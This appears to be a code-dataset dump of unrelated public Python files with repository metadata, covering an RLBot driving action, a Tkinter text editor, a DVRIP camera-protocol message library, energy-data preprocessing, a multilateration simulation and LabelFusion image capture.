] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
import math
from rlbot.agents.base_agent import SimpleControllerState
from rlbot.utils.structures.game_data_struct import GameTickPacket
from driving.drive import drive_to_target
from base.action import Action
from base.car import Car
from base.ball import Ball
from util.vec import Vec3
from util.boost import BoostTracker, Boost
class BoostGrab(Action):
def __init__(self, boost:Boost=None, boost_tracker:BoostTracker=None, only_in_path=False, max_time_to_boost=None, state:str = None):
super().__init__()
self.boost = boost
self.pad = None
self.boost_tracker = boost_tracker
self.in_path = only_in_path
self.max_time = max_time_to_boost
self.target = None
if self.boost is not None:
self.target = Vec3(self.boost.location)
self.state = "grabbing boost"
if state is not None:
self.state = state
def update(self, packet: GameTickPacket):
if self.boost is not None:
self.boost.update(packet)
def initialize_target_boost(self, car:Car):
if not car.flying:
if not self.max_time:
self.boost, self.pad = car.get_closest_boosts(self.boost_tracker, self.in_path)
if not self.boost:
self.boost = self.pad
else:
self.boost, self.pad, times = car.get_closest_boosts(self.boost_tracker, in_current_path=self.in_path,
path_angle_limit=0, return_time_to=True)
# No boost reachable. Life sucks
if times[0] >= self.max_time and times[1] >= self.max_time:
return False
if times[1] < self.max_time:
self.boost = self.pad
print("Boost target acquired!")
self.target = Vec3(self.boost.location)
return True
def run(self, car: Car=None, ball: Ball=None) -> SimpleControllerState:
if self.finished:
return SimpleControllerState()
if not self.boost and self.boost_tracker is not None:
if not self.initialize_target_boost(car):
self.finished = True
# Bail if finished, no boost passed, or boost no longer active
if self.finished or (not self.boost):
return self.controls
self.controls = drive_to_target(car, self.target.flat(), controls=self.controls)
# finished if close enough, boost taken, or car got enough along the way
if (car.local(self.target-car.location).length() < 100 or not self.boost.is_active) or car.boost > 99:
print("Grabbed boost!")
self.finished = True
return self.controls
| 42.96875
| 136
| 0.623636
| 2,418
| 0.879273
| 0
| 0
| 0
| 0
| 0
| 0
| 222
| 0.080727
|
3c5bb249ee0abe83ae7713176bfcb5fd594b89eb
| 2,026
|
py
|
Python
|
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
import sys
from tkinter import *
from tkinter import filedialog
####################
# FUNCTIONS #
####################
def saveas():
global text
t = text.get("1.0", "end-1c")
savelocation = filedialog.asksaveasfilename()
file1 = open(savelocation, "w+")
file1.write(t)
file1.close()
def darktheme():
global text
text.config(background='black', foreground='white',
insertbackground='white')
def lighttheme():
global text
text.config(background='white', foreground='black',
insertbackground='black')
def FontHelvetica():
global text
text.config(font="Helvetica")
def FontCourier():
global text
text.config(font="Courier")
def FontArial():
global text
text.config(font="Arial")
def FontTimes():
global text
text.config(font='Times')
#########################
# TEXT EDITOR
#########################
# Create text editor
text_editor = Tk("Kenza's text editor")
# Add text widget
text = Text(text_editor)
text.grid()
# Add save button
button = Button(text_editor, text="Save", command=saveas)
button.grid(row=1, column=1)
# Dark mode
theme = Button(text_editor, text="Dark", command=darktheme)
theme.grid(row=1, column=2)
# Light mode
theme = Button(text_editor, text="Light", command=lighttheme)
theme.grid(row=1, column=3)
# Add font menu
font = Menubutton(text_editor, text="Font")
font.grid(row=1, column=4)
font.menu = Menu(font, tearoff=0)
font["menu"] = font.menu
Helvetica = IntVar()
Arial = IntVar()
Times = IntVar()
Courier = IntVar()
font.menu.add_checkbutton(label="Courier", variable=Courier,
command=FontCourier)
font.menu.add_checkbutton(label="Helvetica", variable=Helvetica,
command=FontHelvetica)
font.menu.add_checkbutton(label="Arial", variable=Arial,
command=FontArial)
font.menu.add_checkbutton(label="Times", variable=Times,
command=FontTimes)
text_editor.mainloop()
| 20.886598
| 64
| 0.633268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 387
| 0.191017
|
3c5cbe5565f6ab8319a2c93389c8a977b851666a
| 525
|
py
|
Python
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 106
|
2017-11-09T13:58:45.000Z
|
2021-12-20T03:11:19.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 6
|
2017-10-30T13:29:49.000Z
|
2021-09-13T12:06:59.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 39
|
2017-10-30T16:35:01.000Z
|
2021-10-31T10:32:48.000Z
|
""" Default import all .py files in current directory """
from glob import iglob
from re import search
__all__ = []
""" Find all DB model modules and their paths """
for path in iglob('./**/*.py', recursive=True):
model_pattern = '.*/models/\w+\.py'
if search(model_pattern, path) is not None:
""" Get model modules """
FILE_INDEX = -1 # Files are the last part of a path
module = path.split('/')[FILE_INDEX].rstrip('.py')
if module != '__init__':
__all__.append(module)
| 32.8125
| 59
| 0.617143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 214
| 0.407619
|
3c5cc632bb94b5ef7ccfb33dc669053fbfcfe760
| 1,374
|
py
|
Python
|
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
from tdoa_sim import TDOASim
import numpy as np
class Multilateration(TDOASim):
# Assumptions: Three hydrophones forming a right angle in the xz plane
# Hydrophones 1 and 2 form the horizontal pair, and 2 and 3 form the vertical
# https://en.wikipedia.org/wiki/Multilateration - cartesian solution
def calculate_xyz(self, pinger_loc):
relative_toas = self.calc_tdoas(pinger_loc) + .01 # Add 1 to eliminate div by 0 - this needs a much better implementation
x1, y1, z1 = self.hydrophones[0]
t1 = relative_toas[0]
c = self.v_sound
lhs = []
rhs = []
for i in range(1, 4):
xm, ym, zm = self.hydrophones[i]
tm = relative_toas[i]
A = (2 * xm) / (c * tm) - (2 * x1) / (c * t1)
B = (2 * ym) / (c * tm) - (2 * y1) / (c * t1)
C = (2 * zm) / (c * tm) - (2 * z1) / (c * t1)
D = c*tm - c*t1 - (xm ** 2 + ym ** 2 +zm ** 2)/(c * tm) + (x1 ** 2 + y1 ** 2 + z1 ** 2)/(c * t1)
lhs.append([A, B, C])
rhs.append(-D)
lhs = np.array(lhs)
rhs = np.array(rhs)
return np.linalg.solve(lhs, rhs)
def calculate_bearing(self, pinger_loc):
x, y, z = self.calculate_xyz(pinger_loc)
return (np.rad2deg(np.arctan2(y, x)), np.rad2deg(np.arctan2(np.sqrt(x ** 2 + y ** 2), z)))
| 37.135135
| 129
| 0.532751
| 1,323
| 0.962882
| 0
| 0
| 0
| 0
| 0
| 0
| 286
| 0.208151
|
3c5dbe6d61fbd8cfdc1de683ac736616ff35e009
| 2,811
|
py
|
Python
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2021-09-18T08:01:19.000Z
|
2021-09-18T08:01:19.000Z
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | null | null | null |
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2018-05-13T08:39:46.000Z
|
2018-05-13T08:39:46.000Z
|
#! usr/bin/python3
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict, defaultdict
import matplotlib as mpl
import matplotlib.pyplot as plt
# import seaborn as sns
from scipy import stats, integrate
# sns.set() # switch to seaborn default
# sns.set_style("whitegrid")
#load sector msncodes
tn_msncodes = pd.read_csv("data/csv/consumption/sector/tn_sector.csv", engine='c', low_memory=True)["MSN"]
#load state data
tx_data = pd.read_csv("data/csv/state_data/tx_data.csv", engine='c', low_memory=True)
tx_msn = []
tx_year = []
tx_value = []
for i in range(len(tx_data["MSN"])):
for j in range(len(tn_msncodes)):
if tx_data["MSN"][i] == tn_msncodes[j]:
tx_msn.append(tx_data["MSN"][i])
tx_year.append(tx_data["Year"][i])
tx_value.append(tx_data["Data"][i])
else:
pass
tx_tn = OrderedDict()
tx_tn["MSN"] = tx_msn
tx_tn["Year"] = tx_year
tx_tn["Data"] = tx_value
tx_tn_data = pd.DataFrame(tx_tn)
tx_tn_data.to_csv("data/csv/consumption/sector/tx/tx_tn_data.csv",
index=False, index_label=False, sep=',')
# print(tx_tn_data)
sectors = ["TNACB", "TNCCB", "TNICB", "TNRCB"]
tnacb = OrderedDict()
tnacb["Year"] = []
tnacb["Data"] = []
tnccb = OrderedDict()
tnccb["Year"] = []
tnccb["Data"] = []
tnicb = OrderedDict()
tnicb["Year"] = []
tnicb["Data"] = []
tnrcb = OrderedDict()
tnrcb["Year"] = []
tnrcb["Data"] = []
for i in range(len(tx_tn_data["MSN"])):
if tx_tn_data["MSN"][i] == "TNACB":
tnacb["Year"].append(tx_tn_data["Year"][i])
tnacb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNCCB":
tnccb["Year"].append(tx_tn_data["Year"][i])
tnccb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNICB":
tnicb["Year"].append(tx_tn_data["Year"][i])
tnicb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNRCB":
tnrcb["Year"].append(tx_tn_data["Year"][i])
tnrcb["Data"].append(tx_tn_data["Data"][i])
else:
pass
tnacb_data = pd.DataFrame(tnacb)
tnacb_data.to_csv("data/csv/consumption/sector/tx/tn/tnacb.csv",
index=False, index_label=False, sep=',')
tnccb_data = pd.DataFrame(tnccb)
tnccb_data.to_csv("data/csv/consumption/sector/tx/tn/tnccb.csv",
index=False, index_label=False, sep=',')
tnicb_data = pd.DataFrame(tnicb)
tnicb_data.to_csv("data/csv/consumption/sector/tx/tn/tnicb.csv",
index=False, index_label=False, sep=',')
tnrcb_data = pd.DataFrame(tnrcb)
tnrcb_data.to_csv("data/csv/consumption/sector/tx/tn/tnrcb.csv",
index=False, index_label=False, sep=',')
# print(tnacb_data)
# print(tnccb_data)
# print(tnicb_data)
# print(tnrcb_data)
| 30.554348
| 106
| 0.645322
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 838
| 0.298115
|
3c5e4a066c2e5a426373071cec77c0e0b8244f50
| 10,040
|
py
|
Python
|
dvrip/message.py
|
alexshpilkin/xmeye
|
e76df1d091d85aa6cffb5c332ba6ae419ac9ac89
|
[
"CC0-1.0"
] | 34
|
2019-05-04T06:06:17.000Z
|
2021-12-06T03:28:40.000Z
|
dvrip/message.py
|
alexshpilkin/xmeye
|
e76df1d091d85aa6cffb5c332ba6ae419ac9ac89
|
[
"CC0-1.0"
] | 9
|
2019-06-17T09:37:50.000Z
|
2020-10-24T22:36:29.000Z
|
dvrip/message.py
|
alexshpilkin/xmeye
|
e76df1d091d85aa6cffb5c332ba6ae419ac9ac89
|
[
"CC0-1.0"
] | 21
|
2019-06-17T09:34:27.000Z
|
2022-03-22T18:14:22.000Z
|
from abc import abstractmethod
from datetime import datetime, timedelta
from enum import Enum, unique
from io import RawIOBase
from json import dumps, load
from string import hexdigits
from typing import ClassVar, Generator, Generic, Iterable, List, Optional, \
Sequence, Type, TypeVar, Union, cast
from .errors import DVRIPDecodeError
from .packet import Packet
from .typing import Value, for_json, json_to
_C = TypeVar('_C', bound='Choice')
_M = TypeVar('_M', bound='Message')
_R = TypeVar('_R', bound='Status')
_S = TypeVar('_S', bound='Session')
_T = TypeVar('_T')
class _ChunkReader(RawIOBase):
def __init__(self, chunks: Iterable[bytes]) -> None:
super().__init__()
self.chunks = list(chunks)
self.chunks.reverse()
def readable(self) -> bool:
return True
def readinto(self, buffer: bytearray) -> int:
if not self.chunks:
return 0 # EOF
chunk = self.chunks[-1]
assert chunk
buffer[:len(chunk)] = chunk[:len(buffer)]
if len(chunk) > len(buffer): # pylint: disable=no-else-return
self.chunks[-1] = chunk[len(buffer):]
return len(buffer)
else:
self.chunks.pop()
return len(chunk)
def _hex_for_json(value: int) -> object:
return for_json('0x{:08X}'.format(value))
def _json_to_hex(datum: object) -> int:
datum = json_to(str)(datum)
if (datum[:2] != '0x' or len(datum) > 10 or
not all(c in hexdigits for c in datum[2:])):
raise DVRIPDecodeError('not a session ID')
return int(datum[2:], 16)
hextype = (_json_to_hex, _hex_for_json)
_DTFORMAT = '%Y-%m-%d %H:%M:%S'
_NOSTRING = '0000-00-00 00:00:00'
_EPSTRING = '2000-00-00 00:00:00'
EPOCH = datetime(2000, 1, 1, 0, 0, 0)
RESOLUTION = timedelta(seconds=1)
def _datetime_for_json(value: Optional[datetime]) -> object:
if value is None:
return _NOSTRING
if value == EPOCH:
return _EPSTRING
if value <= EPOCH:
raise ValueError('datetime not after the epoch')
return for_json(value.strftime(_DTFORMAT))
def _json_to_datetime(datum: object) -> Optional[datetime]:
datum = json_to(str)(datum)
if datum == _NOSTRING:
return None
if datum == _EPSTRING:
return EPOCH
try:
value = datetime.strptime(datum, _DTFORMAT)
except ValueError:
raise DVRIPDecodeError('not a datetime string')
if value <= EPOCH:
raise DVRIPDecodeError('datetime not after the epoch')
return value
datetimetype = (_json_to_datetime, _datetime_for_json)
class Choice(Enum):
def __repr__(self) -> str:
return '{}.{}'.format(type(self).__qualname__, self.name)
def __str__(self) -> str:
return self.value
def for_json(self) -> object:
return for_json(self.value)
@classmethod
def json_to(cls: Type[_C], datum: object) -> _C:
try:
return cls(json_to(str)(datum))
except ValueError:
raise DVRIPDecodeError('not a known choice')
class Session(object):
__slots__ = ('id',)
def __init__(self, id: int) -> None: # pylint: disable=redefined-builtin
self.id = id
def __repr__(self) -> str:
return 'Session(0x{:08X})'.format(self.id)
def __eq__(self, other: object):
if not isinstance(other, Session):
return NotImplemented
return self.id == other.id
def __hash__(self) -> int:
return hash(self.id)
def for_json(self) -> object:
return _hex_for_json(self.id)
@classmethod
def json_to(cls: Type[_S], datum: object) -> _S:
return cls(id=_json_to_hex(datum))
@unique
class Status(Enum): # FIXME derive from Choice
__slots__ = ('code', 'success', 'message', '_value_')
code: int
success: bool
message: str
def __new__(cls: Type[_R], code, success, message) -> _R:
self = object.__new__(cls)
self._value_ = code # pylint: disable=protected-access
self.code = code
self.success = success
self.message = message
return self
# FIXME __init__
def __repr__(self) -> str:
return '{}({!r})'.format(type(self).__qualname__, self._value_)
def __str__(self) -> str:
return self.message
def __bool__(self) -> bool:
return self.success
def for_json(self) -> object:
return for_json(self.code)
@classmethod
def json_to(cls: Type[_R], datum: object) -> _R:
try:
return cls(json_to(int)(datum)) # type: ignore # pylint: disable=no-value-for-parameter
except ValueError:
raise DVRIPDecodeError('not a known status code')
# pylint: disable=line-too-long
OK = (100, True, 'OK')
ERROR = (101, False, 'Unknown error')
VERSION = (102, False, 'Invalid version')
REQUEST = (103, False, 'Invalid request') # FIXME type?
EXLOGIN = (104, False, 'Already logged in')
NOLOGIN = (105, False, 'Not logged in')
CREDS = (106, False, 'Wrong username or password')
ACCESS = (107, False, 'Access denied')
TIMEOUT = (108, False, 'Timed out')
FILE = (109, False, 'File not found')
SRCHCOMP = (110, True, 'Complete search results')
SRCHPART = (111, True, 'Partial search results')
EXUSER = (112, False, 'User already exists')
NOUSER = (113, False, 'User does not exist')
EXGROUP = (114, False, 'Group already exists')
NOGROUP = (115, False, 'Group does not exist')
MESSAGE = (117, False, 'Invalid message') # FIXME JSON?
PTZPROTO = (118, False, 'PTZ protocol not set')
SRCHNONE = (119, True, 'No search results')
DISABLED = (120, False, 'Disabled') # FIXME 配置为启用
CONNECT = (121, False, 'Channel not connected')
REBOOT = (150, True, 'Reboot required')
FIXME202 = (202, False, 'FIXME Error 202') # FIXME 用户未登录
PASSWORD = (203, False, 'Wrong password')
USERNAME = (204, False, 'Wrong username')
LOCKOUT = (205, False, 'Locked out')
BANNED = (206, False, 'Banned')
CONFLICT = (207, False, 'Already logged in')
INPUT = (208, False, 'Illegal value') # FIXME of field?
FIXME209 = (209, False, 'FIXME Error 209') # FIXME 索引重复如要增加的用户已经存在等
FIXME210 = (210, False, 'FIXME Error 210') # FIXME 不存在对象, 用于查询时
OBJECT = (211, False, 'Object does not exist')
ACCOUNT = (212, False, 'Account in use')
SUBSET = (213, False, 'Subset larger than superset')
PASSCHAR = (214, False, 'Illegal characters in password') # FIXME 密码不合法
PASSMTCH = (215, False, 'Passwords do not match')
USERRESV = (216, False, 'Username reserved')
COMMAND = (502, False, 'Illegal command') # FIXME 命令不合法
INTERON = (503, True, 'Intercom turned on')
INTEROFF = (504, True, 'Intercom turned off') # FIXME 对讲未开启
OKUPGR = (511, True, 'Upgrade started')
NOUPGR = (512, False, 'Upgrade not started')
UPGRDATA = (513, False, 'Invalid upgrade data')
OKUPGRD = (514, True, 'Upgrade successful')
NOUPGRD = (515, False, 'Upgrade failed')
NORESET = (521, False, 'Reset failed')
OKRESET = (522, True, 'Reset successful--reboot required') # FIXME 需要重启设备
INVRESET = (523, False, 'Reset data invalid')
OKIMPORT = (602, True, 'Import successful--restart required') # FIXME 需要重启应用程序 (et seqq)
REIMPORT = (603, True, 'Import successful--reboot required')
WRITING = (604, False, 'Configuration write failed')
FEATURE = (605, False, 'Unsupported feature in configuration')
READING = (606, False, 'Configuration read failed')
NOIMPORT = (607, False, 'Configuration not found')
SYNTAX = (608, False, 'Illegal configuration syntax')
class Message(Value):
__slots__ = ()
@property
@abstractmethod
def type(self) -> int:
raise NotImplementedError # pragma: no cover
def chunks(self) -> Sequence[bytes]:
size = Packet.MAXLEN # FIXME Don't mention Packet explicitly?
json = dumps(self.for_json()).encode('ascii')
return [json[i:i+size] for i in range(0, len(json), size)]
def topackets(self, session: Session, number: int) -> Iterable[Packet]:
chunks = self.chunks()
length = len(chunks)
if length == 1:
yield Packet(session.id, number, self.type, chunks[0],
fragments=0, fragment=0)
else:
for i, chunk in enumerate(chunks):
yield Packet(session.id, number, self.type,
chunk, fragments=length,
fragment=i)
@classmethod
def fromchunks(cls: Type[_M], chunks: Iterable[bytes]) -> _M:
chunks = list(chunks)
if not chunks:
raise DVRIPDecodeError('no data in DVRIP packet')
chunks[-1] = chunks[-1].rstrip(b'\x00\\')
return cls.json_to(load(_ChunkReader(chunks))) # type: ignore # FIXME
@classmethod
def frompackets(cls: Type[_M], packets: Iterable[Packet]) -> _M:
packets = list(packets)
return cls.fromchunks(p.payload for p in packets if p.payload)
Filter = Generator[Union['NotImplemented', None, _T], Optional[Packet], None]
def controlfilter(cls: Type[_M], number: int) -> Filter[_M]:
count = 0
limit = 0
packets: List[Optional[Packet]] = []
packet = yield None # prime the pump
while True:
assert packet is not None
if packet.type != cls.type:
packet = yield NotImplemented; continue
if packet.number & ~1 != number & ~1:
packet = yield NotImplemented; continue
if not limit:
limit = max(packet.fragments, 1)
packets = [None] * limit
if max(packet.fragments, 1) != limit:
raise DVRIPDecodeError('conflicting fragment counts')
if packet.fragment >= limit:
raise DVRIPDecodeError('invalid fragment number')
if packets[packet.fragment] is not None:
raise DVRIPDecodeError('overlapping fragments')
assert count < limit
packets[packet.fragment] = packet
count += 1
if count < limit:
yield None
packet = yield None
continue
else:
assert all(p is not None for p in packets)
yield cls.frompackets(cast(List[Packet], packets))
return
def streamfilter(type: int) -> Filter[Union[bytes, bytearray, memoryview]]: # pylint: disable=redefined-builtin
packet = yield None # prime the pump
while True:
assert packet is not None
if packet.type != type:
packet = yield NotImplemented
continue
yield packet.payload if packet.payload else None
if packet.end: return
packet = yield None
class Request(Generic[_M], Message):
reply: ClassVar[Type[_M]]
data: ClassVar[int]
@classmethod
def replies(cls, number: int) -> Filter[_M]:
return controlfilter(cls.reply, number)
@classmethod
def stream(cls) -> Filter[Union[bytes, bytearray, memoryview]]:
return streamfilter(cls.data)
| 30.892308
| 112
| 0.684363
| 6,897
| 0.678171
| 1,736
| 0.170698
| 4,926
| 0.484366
| 0
| 0
| 2,310
| 0.227139
|
3c699b1ae35663ad09b05a480af4601cff664c7b
| 1,276
|
py
|
Python
|
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | null | null | null |
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | 1
|
2020-09-06T04:17:59.000Z
|
2020-09-06T04:17:59.000Z
|
opennem/core/stations/station_code_from_duids.py
|
tourdownunder/opennem
|
deec3e2079db9d9d84171010fd0c239170d1e7ce
|
[
"MIT"
] | null | null | null |
from functools import reduce
from typing import List, Optional
from opennem.core.normalizers import is_single_number
def getcommonletters(strlist):
return "".join(
[
x[0]
for x in zip(*strlist)
if reduce(lambda a, b: (a == b) and a or None, x)
]
)
def findcommonstart(strlist):
strlist = strlist[:]
prev = None
while True:
common = getcommonletters(strlist)
if common == prev:
break
strlist.append(common)
prev = common
return getcommonletters(strlist)
def station_code_from_duids(duids: List[str]) -> Optional[str]:
"""
Derives a station code from a list of duids
ex.
BARRON1,BARRON2 => BARRON
OSBAG,OSBAG => OSBAG
"""
if type(duids) is not list:
return None
if not duids:
return None
if len(duids) == 0:
return None
duids_uniq = list(set(duids))
common = findcommonstart(duids_uniq)
if not common:
return None
# strip last character if we have one
if is_single_number(common[-1]):
common = common[:-1]
if common.endswith("_"):
common = common[:-1]
if len(common) > 2:
return common
return None
| 19.044776
| 63
| 0.580721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.143417
|
3c6baa9940a450d52040d4e352d35fb76791c5db
| 1,733
|
py
|
Python
|
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | 1
|
2019-11-06T19:21:49.000Z
|
2019-11-06T19:21:49.000Z
|
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
from database.interface import FirebaseInterface
class Schedule:
def __init__(self):
self.id = None
self.titulo = None
self.data = None
self.caminhao = None
self.mecanico = None
def validateFields(self, office_schedule):
if self.titulo is None:
raise Exception("Título não informado")
if self.data is None:
raise Exception("Data não informada")
else:
for event in office_schedule:
if event["data"] == self.data:
raise Exception("Dia solicitado não está disponível")
if self.caminhao is None:
raise Exception("Caminhão não encontrado")
if self.mecanico is None or self.mecanico["cargo"] != "mecanico":
raise Exception("Mecânico não encontrado")
def buildObject(self, req):
interface = FirebaseInterface()
user_id = req["id_usuario"]
self.mecanico = interface.getData("users", user_id)
truck_board = req["placa_caminhao"]
self.caminhao = interface.getDataByField("trucks", "placa", truck_board)
self.data = req["data"]
self.titulo = req["titulo"]
def setId(self):
interface = FirebaseInterface()
event_id = interface.getData("const_data", "office_id")
self.id = event_id["id"] + 1
interface.updateData({"id": event_id["id"] + 1}, "const_data", "office_id")
@staticmethod
def findIdIndex(id, office):
for index in range(len(office)):
if office[index]["id"] == id:
return index
elif index + 1 == len(office) and office[index]["id"] != id:
raise Exception("Id inválido")
| 30.403509
| 83
| 0.590306
| 1,692
| 0.970183
| 0
| 0
| 279
| 0.159977
| 0
| 0
| 305
| 0.174885
|
3c6c95883a2948952fd4f838b95cb8573feed183
| 381
|
py
|
Python
|
Python/DS/tuple.py
|
salikansari6/interview-prep
|
17e98fbb15f87c9f2ecd293896e613f5fe01d3a3
|
[
"MIT"
] | 1
|
2021-08-23T18:18:41.000Z
|
2021-08-23T18:18:41.000Z
|
Python/DS/tuple.py
|
salikansari6/interview-prep
|
17e98fbb15f87c9f2ecd293896e613f5fe01d3a3
|
[
"MIT"
] | null | null | null |
Python/DS/tuple.py
|
salikansari6/interview-prep
|
17e98fbb15f87c9f2ecd293896e613f5fe01d3a3
|
[
"MIT"
] | 1
|
2021-08-24T15:40:15.000Z
|
2021-08-24T15:40:15.000Z
|
# Tuples are immutable
print("============ tuples ============")
print()
tuples = (12345, 54321, 'hello!')
print(tuples)
u = tuples, (1, 2, 3, 4, 5)
print(u)
# The statement t = 12345, 54321, 'hello!' is an example of tuple packing:
# the values 12345, 54321 and 'hello!'
# are packed together in a tuple. The reverse operation is also possible
x, y, z = tuples
print(x, y, z)
| 22.411765
| 74
| 0.627297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 248
| 0.650919
|
3c6cfcc4cc77979d142a645197f0b512545357ec
| 4,304
|
py
|
Python
|
modules/labelfusion/imagecapture.py
|
hz-ants/LabelFusion-docker2-
|
8dc116064a1bdcfa2c2dd814580b5f43d46c6f40
|
[
"BSD-3-Clause"
] | 313
|
2017-07-16T02:00:16.000Z
|
2022-03-31T11:00:10.000Z
|
modules/labelfusion/imagecapture.py
|
hz-ants/LabelFusion-docker2-
|
8dc116064a1bdcfa2c2dd814580b5f43d46c6f40
|
[
"BSD-3-Clause"
] | 94
|
2017-07-16T19:59:06.000Z
|
2022-03-30T08:14:22.000Z
|
modules/labelfusion/imagecapture.py
|
hz-ants/LabelFusion-docker2-
|
8dc116064a1bdcfa2c2dd814580b5f43d46c6f40
|
[
"BSD-3-Clause"
] | 87
|
2017-07-14T16:01:54.000Z
|
2022-03-23T17:33:47.000Z
|
"""
This class consumes and lcmlog, extracts the images and saves them
to png
"""
import os
# director imports
import director.vtkAll as vtk
from director import filterUtils
from director import lcmUtils
from director import cameraview
import bot_core as lcmbotcore
from . import utils
class ImageCapture(object):
def __init__(self, imageManager, fileSaveLocation,
cameraName="OPENNI_FRAME_LEFT", setupCallback=False):
self.imageManager = imageManager
self.fileSaveLocation = fileSaveLocation
self.cameraName = cameraName
self.counter = 1
self.initialized = False
if setupCallback:
self.setupCallback()
def setupCallback(self):
lcmUtils.addSubscriber("OPENNI_FRAME", lcmbotcore.images_t(),
self.onImageMessage)
def saveImage(self, saveUtime=True, extension="rgb.png"):
# construct filename where this image will be saved
baseFilename = utils.convertImageIDToPaddedString(self.counter) + "_"
baseFilename = os.path.join(self.fileSaveLocation, baseFilename)
imageFilename = baseFilename + extension
self.counter += 1
# get the image and it's utime
self.imageManager.updateImages()
image = self.imageManager.getImage(self.cameraName)
image = filterUtils.flipImage(image)
print 'writing:', imageFilename
ImageCapture.writeImage(image, imageFilename)
if saveUtime:
utime = self.imageManager.getUtime(self.cameraName)
utimeFilename = baseFilename + "utime.txt"
# now save the utime
print 'writing:', utimeFilename
text_file = open(utimeFilename, "w")
text_file.write(str(utime))
text_file.close()
@staticmethod
def writeImage(image, filename):
"""
Writes given image to filename
:param image: vtkImageData
:param filename: full path to file where image should be saved
:return:
"""
writer = vtk.vtkPNGWriter()
writer.SetInput(image)
writer.SetFileName(filename)
writer.Write()
def onImageMessage(self, msg):
"""
Just a trigger to save message
:param msg:
:return:
"""
if not self.initialized:
self.initialized = True
return
self.saveImage()
@staticmethod
def readFromLogFile(lcmLogFilename, fileSaveLocation, channelName="OPENNI_FRAME", cameraName="OPENNI_FRAME_LEFT", saveDepth=False):
"""
Reads from lcmlog located at filename. Goes through each
images_t() message on OPENNI_FRAME channel and saves it
as a png in fileSaveLocation
:param filename: Name of lcmlogfile
:return:
"""
# check if fileSaveLocation is an existing directory, if not create it.
if not os.path.isdir(fileSaveLocation):
os.makedirs(fileSaveLocation)
# construct imageManager object
imageManager = cameraview.ImageManager()
if saveDepth:
imageManager.queue.addCameraStream(channelName, cameraName, lcmbotcore.images_t.DEPTH_MM_ZIPPED)
else:
imageManager.queue.addCameraStream(channelName, cameraName, lcmbotcore.images_t.LEFT)
imageManager.addImage(cameraName)
# open the lcm log
imageManager.queue.openLCMFile(lcmLogFilename)
imageCapture = ImageCapture(imageManager, fileSaveLocation,
cameraName=cameraName, setupCallback=False)
while imageManager.queue.readNextImagesMessage():
if saveDepth:
imageCapture.saveImage(saveUtime=False, extension="depth.png")
else:
imageCapture.saveImage(extension="rgb.png")
print "reached end of lcm log"
return
def captureImages(logFolder, saveDepth):
dataPaths = utils.getFilenames(logFolder)
if saveDepth:
ImageCapture.readFromLogFile(dataPaths['lcmlog'], dataPaths['images'], cameraName="OPENNI_FRAME_DEPTH_MM_ZIPPED", saveDepth=True)
ImageCapture.readFromLogFile(dataPaths['lcmlog'], dataPaths['images'], cameraName="OPENNI_FRAME_LEFT")
def test():
captureImages("logs/moving-camera")
| 32.360902
| 137
| 0.657528
| 3,601
| 0.836664
| 0
| 0
| 1,820
| 0.422862
| 0
| 0
| 1,087
| 0.252556
|
3c6d83deebd752e29ffb47bbb2f60866fbe395f9
| 1,947
|
py
|
Python
|
